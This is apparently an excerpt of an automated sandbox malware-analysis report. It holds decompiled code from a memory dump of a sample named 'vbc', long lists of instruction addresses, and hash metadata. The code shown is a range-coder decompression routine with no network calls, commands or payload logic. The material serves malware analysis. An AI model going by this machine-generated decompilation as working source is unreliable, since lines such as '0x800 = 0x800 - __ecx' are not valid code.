                                                								 *_t406 = _v100 + _v52;
                                                								__eflags =  *_t406;
                                                								goto L126;
                                                							}
                                                							__ecx = __ebx;
                                                							__eax = __ebx;
                                                							__ecx = __ebx >> 1;
                                                							__eax = __ebx & 0x00000001;
                                                							__ecx = (__ebx >> 1) - 1;
                                                							__al = __al | 0x00000002;
                                                							__eax = (__ebx & 0x00000001) << __cl;
                                                							__eflags = __ebx - 0xe;
                                                							_v48 = __eax;
                                                							if(__ebx >= 0xe) {
                                                								__ebx = 0;
                                                								_v76 = __ecx;
                                                								L105:
                                                								__eflags = _v76;
                                                								if(_v76 <= 0) {
                                                									__eax = __eax + __ebx;
                                                									_v68 = 4;
                                                									_v48 = __eax;
                                                									__eax = _v8;
                                                									__eax = _v8 + 0x644;
                                                									__eflags = __eax;
                                                									L111:
                                                									__ebx = 0;
                                                									_v92 = __eax;
                                                									_v84 = 1;
                                                									_v72 = 0;
                                                									_v76 = 0;
                                                									L115:
                                                									__eax = _v68;
                                                									__eflags = _v76 - _v68;
                                                									if(_v76 >= _v68) {
                                                										_t397 =  &_v48;
                                                										 *_t397 = _v48 + __ebx;
                                                										__eflags =  *_t397;
                                                										goto L122;
                                                									}
                                                									__eax = _v84;
                                                									_v20 = _v20 >> 0xb;
                                                									__edi = _v84 + _v84;
                                                									__eax = _v92;
                                                									__esi = __edi + __eax;
                                                									_v88 = __esi;
                                                									__ax =  *__esi;
                                                									__ecx = __ax & 0x0000ffff;
                                                									__edx = (_v20 >> 0xb) * __ecx;
                                                									__eflags = _v16 - __edx;
                                                									if(_v16 >= __edx) {
                                                										__ecx = 0;
                                                										_v20 = _v20 - __edx;
                                                										__ecx = 1;
                                                										_v16 = _v16 - __edx;
                                                										__ebx = 1;
                                                										__ecx = _v76;
                                                										__ebx = 1 << __cl;
                                                										__ecx = 1 << __cl;
                                                										__ebx = _v72;
                                                										__ebx = _v72 | __ecx;
                                                										__cx = __ax;
                                                										__cx = __ax >> 5;
                                                										__eax = __eax - __ecx;
                                                										__edi = __edi + 1;
                                                										__eflags = __edi;
                                                										_v72 = __ebx;
                                                										 *__esi = __ax;
                                                										_v84 = __edi;
                                                									} else {
                                                										_v20 = __edx;
                                                										0x800 = 0x800 - __ecx;
                                                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                										_v84 = _v84 << 1;
                                                										 *__esi = __dx;
                                                									}
                                                									__eflags = _v20 - 0x1000000;
                                                									if(_v20 >= 0x1000000) {
                                                										L114:
                                                										_t374 =  &_v76;
                                                										 *_t374 = _v76 + 1;
                                                										__eflags =  *_t374;
                                                										goto L115;
                                                									} else {
                                                										goto L112;
                                                									}
                                                								}
                                                								__ecx = _v16;
                                                								__ebx = __ebx + __ebx;
                                                								_v20 = _v20 >> 1;
                                                								__eflags = _v16 - _v20;
                                                								_v72 = __ebx;
                                                								if(_v16 >= _v20) {
                                                									__ecx = _v20;
                                                									_v16 = _v16 - _v20;
                                                									__ebx = __ebx | 0x00000001;
                                                									__eflags = __ebx;
                                                									_v72 = __ebx;
                                                								}
                                                								__eflags = _v20 - 0x1000000;
                                                								if(_v20 >= 0x1000000) {
                                                									L104:
                                                									_t344 =  &_v76;
                                                									 *_t344 = _v76 - 1;
                                                									__eflags =  *_t344;
                                                									goto L105;
                                                								} else {
                                                									goto L102;
                                                								}
                                                							}
                                                							__edx = _v8;
                                                							__eax = __eax - __ebx;
                                                							_v68 = __ecx;
                                                							__eax = _v8 + 0x55e + __eax * 2;
                                                							goto L111;
                                                						case 0x1a:
                                                							L58:
                                                							__eflags = _v104;
                                                							if(_v104 == 0) {
                                                								_v140 = 0x1a;
                                                								goto L173;
                                                							}
                                                							__ecx = _v108;
                                                							__al = _v96;
                                                							__edx = _v12;
                                                							_v100 = _v100 + 1;
                                                							_v108 = _v108 + 1;
                                                							_v104 = _v104 - 1;
                                                							 *_v108 = __al;
                                                							__ecx = _v24;
                                                							 *(_v12 + __ecx) = __al;
                                                							__eax = __ecx + 1;
                                                							__edx = 0;
                                                							_t197 = __eax % _v120;
                                                							__eax = __eax / _v120;
                                                							__edx = _t197;
                                                							goto L82;
                                                						case 0x1b:
                                                							L78:
                                                							__eflags = _v104;
                                                							if(_v104 == 0) {
                                                								_v140 = 0x1b;
                                                								goto L173;
                                                							}
                                                							__eax = _v24;
                                                							__eax = _v24 - _v48;
                                                							__eflags = __eax - _v120;
                                                							if(__eax >= _v120) {
                                                								__eax = __eax + _v120;
                                                								__eflags = __eax;
                                                							}
                                                							__edx = _v12;
                                                							__cl =  *(__edx + __eax);
                                                							__eax = _v24;
                                                							_v96 = __cl;
                                                							 *(__edx + __eax) = __cl;
                                                							__eax = __eax + 1;
                                                							__edx = 0;
                                                							_t280 = __eax % _v120;
                                                							__eax = __eax / _v120;
                                                							__edx = _t280;
                                                							__eax = _v108;
                                                							_v100 = _v100 + 1;
                                                							_v108 = _v108 + 1;
                                                							_t289 =  &_v104;
                                                							 *_t289 = _v104 - 1;
                                                							__eflags =  *_t289;
                                                							 *_v108 = __cl;
                                                							L82:
                                                							_v24 = __edx;
                                                							goto L83;
                                                						case 0x1c:
                                                							while(1) {
                                                								L126:
                                                								__eflags = _v104;
                                                								if(_v104 == 0) {
                                                									break;
                                                								}
                                                								__eax = _v24;
                                                								__eax = _v24 - _v48;
                                                								__eflags = __eax - _v120;
                                                								if(__eax >= _v120) {
                                                									__eax = __eax + _v120;
                                                									__eflags = __eax;
                                                								}
                                                								__edx = _v12;
                                                								__cl =  *(__edx + __eax);
                                                								__eax = _v24;
                                                								_v96 = __cl;
                                                								 *(__edx + __eax) = __cl;
                                                								__eax = __eax + 1;
                                                								__edx = 0;
                                                								_t420 = __eax % _v120;
                                                								__eax = __eax / _v120;
                                                								__edx = _t420;
                                                								__eax = _v108;
                                                								_v108 = _v108 + 1;
                                                								_v104 = _v104 - 1;
                                                								_v52 = _v52 - 1;
                                                								__eflags = _v52;
                                                								 *_v108 = __cl;
                                                								_v24 = _t420;
                                                								if(_v52 > 0) {
                                                									continue;
                                                								} else {
                                                									L83:
                                                									_v140 = 2;
                                                									goto L3;
                                                								}
                                                							}
                                                							_v140 = 0x1c;
                                                							L173:
                                                							_push(0x22);
                                                							_pop(_t574);
                                                							memcpy(_v148,  &_v140, _t574 << 2);
                                                							return 0;
                                                					}
                                                				}
                                                				L174:
                                                				_t538 = _t537 | 0xffffffff;
                                                				return _t538;
                                                			}










































                                                0x0040673b
                                                0x00406742
                                                0x00406748
                                                0x0040674e
                                                0x00000000
                                                0x00406752
                                                0x0040675e
                                                0x0040675e
                                                0x0040675e
                                                0x00406767
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00000000
                                                0x00406774
                                                0x00406778
                                                0x00000000
                                                0x00000000
                                                0x00406781
                                                0x00406784
                                                0x00406787
                                                0x00406789
                                                0x0040678b
                                                0x00000000
                                                0x00000000
                                                0x00406791
                                                0x00406794
                                                0x00406796
                                                0x00406797
                                                0x0040679a
                                                0x0040679c
                                                0x0040679d
                                                0x0040679f
                                                0x004067a2
                                                0x004067a7
                                                0x004067ac
                                                0x004067b5
                                                0x004067c8
                                                0x004067cb
                                                0x004067d4
                                                0x004067d7
                                                0x004067ff
                                                0x004067ff
                                                0x00406801
                                                0x0040680f
                                                0x0040680f
                                                0x00406813
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406803
                                                0x00406803
                                                0x00406806
                                                0x00406806
                                                0x00406807
                                                0x00406807
                                                0x00000000
                                                0x00406803
                                                0x004067d9
                                                0x004067dd
                                                0x004067e2
                                                0x004067e2
                                                0x004067eb
                                                0x004067f1
                                                0x004067f3
                                                0x004067f6
                                                0x00000000
                                                0x004067fc
                                                0x004067fc
                                                0x00000000
                                                0x004067fc
                                                0x00000000
                                                0x00406819
                                                0x00406819
                                                0x0040681d
                                                0x004070c9
                                                0x00000000
                                                0x004070c9
                                                0x00406826
                                                0x00406836
                                                0x00406839
                                                0x0040683c
                                                0x0040683c
                                                0x0040683c
                                                0x0040683f
                                                0x0040683f
                                                0x00406843
                                                0x00000000
                                                0x00000000
                                                0x00406845
                                                0x00406848
                                                0x0040684b
                                                0x00406875
                                                0x0040687b
                                                0x00406882
                                                0x00000000
                                                0x00406882
                                                0x0040684d
                                                0x00406851
                                                0x00406854
                                                0x00406859
                                                0x00406859
                                                0x00406864
                                                0x0040686a
                                                0x0040686c
                                                0x0040686f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068b4
                                                0x004068ba
                                                0x004068bd
                                                0x004068ca
                                                0x004068d2
                                                0x00000000
                                                0x00000000
                                                0x00406889
                                                0x00406889
                                                0x0040688d
                                                0x004070d8
                                                0x00000000
                                                0x004070d8
                                                0x00406899
                                                0x004068a4
                                                0x004068a4
                                                0x004068a4
                                                0x004068a7
                                                0x004068aa
                                                0x004068ad
                                                0x004068b0
                                                0x004068b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f58
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f8e
                                                0x00406f95
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f97
                                                0x00406f97
                                                0x00406f9b
                                                0x0040714a
                                                0x00000000
                                                0x0040714a
                                                0x00406fa7
                                                0x00406fae
                                                0x00406fb6
                                                0x00406fb6
                                                0x00406fb6
                                                0x00406fb9
                                                0x00406fbc
                                                0x00406fbc
                                                0x00000000
                                                0x00000000
                                                0x004068da
                                                0x004068dc
                                                0x004068df
                                                0x00406950
                                                0x00406953
                                                0x00406956
                                                0x0040695d
                                                0x00406967
                                                0x00000000
                                                0x00406967
                                                0x004068e1
                                                0x004068e5
                                                0x004068e8
                                                0x004068ea
                                                0x004068ed
                                                0x004068f0
                                                0x004068f2
                                                0x004068f5
                                                0x004068f7
                                                0x004068fc
                                                0x004068ff
                                                0x00406902
                                                0x00406906
                                                0x0040690d
                                                0x00406910
                                                0x00406917
                                                0x0040691b
                                                0x00406923
                                                0x00406923
                                                0x00406923
                                                0x0040691d
                                                0x0040691d
                                                0x0040691d
                                                0x00406912
                                                0x00406912
                                                0x00406912
                                                0x00406927
                                                0x0040692a
                                                0x00406948
                                                0x0040694a
                                                0x00000000
                                                0x0040694a
                                                0x0040692c
                                                0x0040692f
                                                0x00406932
                                                0x00406935
                                                0x00406937
                                                0x00406937
                                                0x00406937
                                                0x0040693a
                                                0x0040693d
                                                0x0040693f
                                                0x00406940
                                                0x00406943
                                                0x00000000
                                                0x00000000
                                                0x00406b79
                                                0x00406b7d
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba5
                                                0x00406ba8
                                                0x00406bab
                                                0x00406bae
                                                0x00406bb1
                                                0x00406bb4
                                                0x00406bb6
                                                0x00406bbd
                                                0x00406bbe
                                                0x00406bc0
                                                0x00406bc3
                                                0x00406bc6
                                                0x00406bc9
                                                0x00406bc9
                                                0x00406bce
                                                0x00000000
                                                0x00406bce
                                                0x00406b7f
                                                0x00406b82
                                                0x00406b85
                                                0x00406b8f
                                                0x00000000
                                                0x00000000
                                                0x00406be3
                                                0x00406be7
                                                0x00406c0a
                                                0x00406c0d
                                                0x00406c10
                                                0x00406c1a
                                                0x00406be9
                                                0x00406be9
                                                0x00406bec
                                                0x00406bef
                                                0x00406bf2
                                                0x00406bff
                                                0x00406c02
                                                0x00406c02
                                                0x00000000
                                                0x00000000
                                                0x00406c26
                                                0x00406c2a
                                                0x00000000
                                                0x00000000
                                                0x00406c30
                                                0x00406c34
                                                0x00000000
                                                0x00000000
                                                0x00406c3a
                                                0x00406c3c
                                                0x00406c40
                                                0x00406c40
                                                0x00406c43
                                                0x00406c47
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c9b
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406cb2
                                                0x00000000
                                                0x00406cb2
                                                0x00406c9d
                                                0x00000000
                                                0x00000000
                                                0x00406cbe
                                                0x00406cc2
                                                0x00406cc9
                                                0x00406ccc
                                                0x00406ccf
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cd2
                                                0x00406cd5
                                                0x00406cd8
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ceb
                                                0x00406cf0
                                                0x00000000
                                                0x00000000
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d82
                                                0x00407120
                                                0x00000000
                                                0x00407120
                                                0x00406d88
                                                0x00406d8b
                                                0x00406d8e
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9b
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da0
                                                0x00406da3
                                                0x00000000
                                                0x00000000
                                                0x00406973
                                                0x00406973
                                                0x00406977
                                                0x004070e4
                                                0x00000000
                                                0x004070e4
                                                0x0040697d
                                                0x00406980
                                                0x00406983
                                                0x00406987
                                                0x0040698a
                                                0x00406990
                                                0x00406992
                                                0x00406992
                                                0x00406992
                                                0x00406995
                                                0x00406998
                                                0x00406998
                                                0x0040699b
                                                0x0040699e
                                                0x00000000
                                                0x00000000
                                                0x004069a4
                                                0x004069aa
                                                0x00000000
                                                0x00000000
                                                0x004069b0
                                                0x004069b0
                                                0x004069b4
                                                0x004069b7
                                                0x004069ba
                                                0x004069bd
                                                0x004069c0
                                                0x004069c1
                                                0x004069c4
                                                0x004069c6
                                                0x004069cc
                                                0x004069cf
                                                0x004069d2
                                                0x004069d5
                                                0x004069d8
                                                0x004069db
                                                0x004069de
                                                0x004069fa
                                                0x004069fd
                                                0x00406a00
                                                0x00406a03
                                                0x00406a0a
                                                0x00406a0e
                                                0x00406a10
                                                0x00406a14
                                                0x004069e0
                                                0x004069e0
                                                0x004069e4
                                                0x004069ec
                                                0x004069f1
                                                0x004069f3
                                                0x004069f5
                                                0x004069f5
                                                0x00406a17
                                                0x00406a1e
                                                0x00406a21
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a2c
                                                0x00406a2c
                                                0x00406a30
                                                0x004070f0
                                                0x00000000
                                                0x004070f0
                                                0x00406a36
                                                0x00406a39
                                                0x00406a3c
                                                0x00406a40
                                                0x00406a43
                                                0x00406a49
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a51
                                                0x00406a51
                                                0x00406a51
                                                0x00406a57
                                                0x00000000
                                                0x00000000
                                                0x00406a59
                                                0x00406a5c
                                                0x00406a5f
                                                0x00406a62
                                                0x00406a65
                                                0x00406a68
                                                0x00406a6b
                                                0x00406a6e
                                                0x00406a71
                                                0x00406a74
                                                0x00406a77
                                                0x00406a8f
                                                0x00406a92
                                                0x00406a95
                                                0x00406a98
                                                0x00406a98
                                                0x00406a9b
                                                0x00406a9f
                                                0x00406aa1
                                                0x00406a79
                                                0x00406a79
                                                0x00406a81
                                                0x00406a86
                                                0x00406a88
                                                0x00406a8a
                                                0x00406a8a
                                                0x00406aa4
                                                0x00406aab
                                                0x00406aae
                                                0x00000000
                                                0x00406ab0
                                                0x00000000
                                                0x00406ab0
                                                0x00406aae
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00000000
                                                0x00000000
                                                0x00406af0
                                                0x00406af0
                                                0x00406af4
                                                0x004070fc
                                                0x00000000
                                                0x004070fc
                                                0x00406afa
                                                0x00406afd
                                                0x00406b00
                                                0x00406b04
                                                0x00406b07
                                                0x00406b0d
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b12
                                                0x00406b15
                                                0x00406b15
                                                0x00406b1b
                                                0x00406ab9
                                                0x00406ab9
                                                0x00406abc
                                                0x00000000
                                                0x00406abc
                                                0x00406b1d
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b29
                                                0x00406b2c
                                                0x00406b2f
                                                0x00406b32
                                                0x00406b35
                                                0x00406b38
                                                0x00406b3b
                                                0x00406b53
                                                0x00406b56
                                                0x00406b59
                                                0x00406b5c
                                                0x00406b5c
                                                0x00406b5f
                                                0x00406b63
                                                0x00406b65
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b45
                                                0x00406b4a
                                                0x00406b4c
                                                0x00406b4e
                                                0x00406b4e
                                                0x00406b68
                                                0x00406b6f
                                                0x00406b72
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406e01
                                                0x00406e01
                                                0x00406e05
                                                0x0040712c
                                                0x00000000
                                                0x0040712c
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e15
                                                0x00406e18
                                                0x00406e1e
                                                0x00406e20
                                                0x00406e20
                                                0x00406e20
                                                0x00406e23
                                                0x00000000
                                                0x00000000
                                                0x00406bd1
                                                0x00406bd1
                                                0x00406bd4
                                                0x00000000
                                                0x00000000
                                                0x00406f10
                                                0x00406f14
                                                0x00406f36
                                                0x00406f39
                                                0x00406f43
                                                0x00406f46
                                                0x00406f46
                                                0x00000000
                                                0x00406f46
                                                0x00406f16
                                                0x00406f19
                                                0x00406f1d
                                                0x00406f20
                                                0x00406f20
                                                0x00406f23
                                                0x00000000
                                                0x00000000
                                                0x00406fcd
                                                0x00406fd1
                                                0x00406fef
                                                0x00406fef
                                                0x00406fef
                                                0x00406ff6
                                                0x00406ffd
                                                0x00407004
                                                0x00407004
                                                0x00000000
                                                0x00407004
                                                0x00406fd3
                                                0x00406fd6
                                                0x00406fd9
                                                0x00406fdc
                                                0x00406fe3
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00000000
                                                0x00000000
                                                0x004070be
                                                0x004070c1
                                                0x00000000
                                                0x00000000
                                                0x00406cf8
                                                0x00406cfa
                                                0x00406d01
                                                0x00406d02
                                                0x00406d04
                                                0x00406d07
                                                0x00000000
                                                0x00000000
                                                0x00406d0f
                                                0x00406d12
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d1a
                                                0x00406d1d
                                                0x00406d24
                                                0x00406d27
                                                0x00406d35
                                                0x00000000
                                                0x00000000
                                                0x0040700b
                                                0x0040700b
                                                0x0040700e
                                                0x00407015
                                                0x00000000
                                                0x00000000
                                                0x0040701a
                                                0x0040701a
                                                0x0040701e
                                                0x00407156
                                                0x00000000
                                                0x00407156
                                                0x00407024
                                                0x00407027
                                                0x0040702a
                                                0x0040702e
                                                0x00407031
                                                0x00407037
                                                0x00407039
                                                0x00407039
                                                0x00407039
                                                0x0040703c
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x00407042
                                                0x00407042
                                                0x00407046
                                                0x004070a6
                                                0x004070a9
                                                0x004070ae
                                                0x004070af
                                                0x004070b1
                                                0x004070b3
                                                0x004070b6
                                                0x00406fc2
                                                0x00406fc2
                                                0x00000000
                                                0x00406fc2
                                                0x00407048
                                                0x0040704e
                                                0x00407051
                                                0x00407054
                                                0x00407057
                                                0x0040705a
                                                0x0040705d
                                                0x00407060
                                                0x00407063
                                                0x00407066
                                                0x00407069
                                                0x00407082
                                                0x00407085
                                                0x00407088
                                                0x0040708b
                                                0x0040708f
                                                0x00407091
                                                0x00407091
                                                0x00407092
                                                0x00407095
                                                0x0040706b
                                                0x0040706b
                                                0x00407073
                                                0x00407078
                                                0x0040707a
                                                0x0040707d
                                                0x0040707d
                                                0x00407098
                                                0x0040709f
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x00406d3d
                                                0x00406d40
                                                0x00406d76
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406ea9
                                                0x00406eac
                                                0x00406eae
                                                0x00407138
                                                0x00000000
                                                0x00407138
                                                0x00406eb4
                                                0x00406eb7
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec4
                                                0x00406ec4
                                                0x00000000
                                                0x00406ec4
                                                0x00406d42
                                                0x00406d44
                                                0x00406d46
                                                0x00406d48
                                                0x00406d4b
                                                0x00406d4c
                                                0x00406d4e
                                                0x00406d50
                                                0x00406d53
                                                0x00406d56
                                                0x00406d6c
                                                0x00406d71
                                                0x00406da9
                                                0x00406da9
                                                0x00406dad
                                                0x00406dd9
                                                0x00406ddb
                                                0x00406de2
                                                0x00406de5
                                                0x00406de8
                                                0x00406de8
                                                0x00406ded
                                                0x00406ded
                                                0x00406def
                                                0x00406df2
                                                0x00406df9
                                                0x00406dfc
                                                0x00406e29
                                                0x00406e29
                                                0x00406e2c
                                                0x00406e2f
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00000000
                                                0x00406ea3
                                                0x00406e31
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e40
                                                0x00406e43
                                                0x00406e46
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4f
                                                0x00406e52
                                                0x00406e6b
                                                0x00406e6d
                                                0x00406e70
                                                0x00406e71
                                                0x00406e74
                                                0x00406e76
                                                0x00406e79
                                                0x00406e7b
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e82
                                                0x00406e85
                                                0x00406e89
                                                0x00406e8b
                                                0x00406e8b
                                                0x00406e8c
                                                0x00406e8f
                                                0x00406e92
                                                0x00406e54
                                                0x00406e54
                                                0x00406e5c
                                                0x00406e61
                                                0x00406e63
                                                0x00406e66
                                                0x00406e66
                                                0x00406e95
                                                0x00406e9c
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00000000
                                                0x00406e9e
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9c
                                                0x00406daf
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dba
                                                0x00406dbd
                                                0x00406dbf
                                                0x00406dc2
                                                0x00406dc5
                                                0x00406dc5
                                                0x00406dc8
                                                0x00406dc8
                                                0x00406dcb
                                                0x00406dd2
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406d58
                                                0x00406d5b
                                                0x00406d5d
                                                0x00406d60
                                                0x00000000
                                                0x00000000
                                                0x00406abf
                                                0x00406abf
                                                0x00406ac3
                                                0x00407108
                                                0x00000000
                                                0x00407108
                                                0x00406ac9
                                                0x00406acc
                                                0x00406acf
                                                0x00406ad2
                                                0x00406ad5
                                                0x00406ad8
                                                0x00406adb
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406ae8
                                                0x00000000
                                                0x00000000
                                                0x00406c4a
                                                0x00406c4a
                                                0x00406c4e
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406c54
                                                0x00406c57
                                                0x00406c5a
                                                0x00406c5d
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c65
                                                0x00406c68
                                                0x00406c6b
                                                0x00406c6e
                                                0x00406c71
                                                0x00406c72
                                                0x00406c74
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7d
                                                0x00406c80
                                                0x00406c80
                                                0x00406c80
                                                0x00406c83
                                                0x00406c85
                                                0x00406c85
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ecb
                                                0x00000000
                                                0x00000000
                                                0x00406ed1
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edc
                                                0x00406edc
                                                0x00406edc
                                                0x00406edf
                                                0x00406ee2
                                                0x00406ee5
                                                0x00406ee8
                                                0x00406eeb
                                                0x00406eee
                                                0x00406eef
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406efa
                                                0x00406efd
                                                0x00406f00
                                                0x00406f04
                                                0x00406f06
                                                0x00406f09
                                                0x00000000
                                                0x00406f0b
                                                0x00406c88
                                                0x00406c88
                                                0x00000000
                                                0x00406c88
                                                0x00406f09
                                                0x0040713e
                                                0x00407160
                                                0x00407166
                                                0x00407168
                                                0x0040716f
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00407175
                                                0x00407175
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                • Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
                                                • Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                • Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406B79() {
                                                				signed int _t539;
                                                				unsigned short _t540;
                                                				signed int _t541;
                                                				void _t542;
                                                				signed int _t543;
                                                				signed int _t544;
                                                				signed int _t573;
                                                				signed int _t576;
                                                				signed int _t597;
                                                				signed int* _t614;
                                                				void* _t621;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t621 - 0x40) != 1) {
                                                						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                						_t539 =  *(_t621 - 4) + 0x664;
                                                						 *(_t621 - 0x58) = _t539;
                                                						goto L68;
                                                					} else {
                                                						 *(__ebp - 0x84) = 8;
                                                						while(1) {
                                                							L132:
                                                							 *(_t621 - 0x54) = _t614;
                                                							while(1) {
                                                								L133:
                                                								_t540 =  *_t614;
                                                								_t597 = _t540 & 0x0000ffff;
                                                								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                								if( *(_t621 - 0xc) >= _t573) {
                                                									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                									 *(_t621 - 0x40) = 1;
                                                									_t541 = _t540 - (_t540 >> 5);
                                                									 *_t614 = _t541;
                                                								} else {
                                                									 *(_t621 - 0x10) = _t573;
                                                									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                								}
                                                								if( *(_t621 - 0x10) >= 0x1000000) {
                                                									goto L139;
                                                								}
                                                								L137:
                                                								if( *(_t621 - 0x6c) == 0) {
                                                									 *(_t621 - 0x88) = 5;
                                                									L170:
                                                									_t576 = 0x22;
                                                									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                									_t544 = 0;
                                                									L172:
                                                									return _t544;
                                                								}
                                                								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                								L139:
                                                								_t542 =  *(_t621 - 0x84);
                                                								while(1) {
                                                									 *(_t621 - 0x88) = _t542;
                                                									while(1) {
                                                										L1:
                                                										_t543 =  *(_t621 - 0x88);
                                                										if(_t543 > 0x1c) {
                                                											break;
                                                										}
                                                										switch( *((intOrPtr*)(_t543 * 4 +  &M0040717D))) {
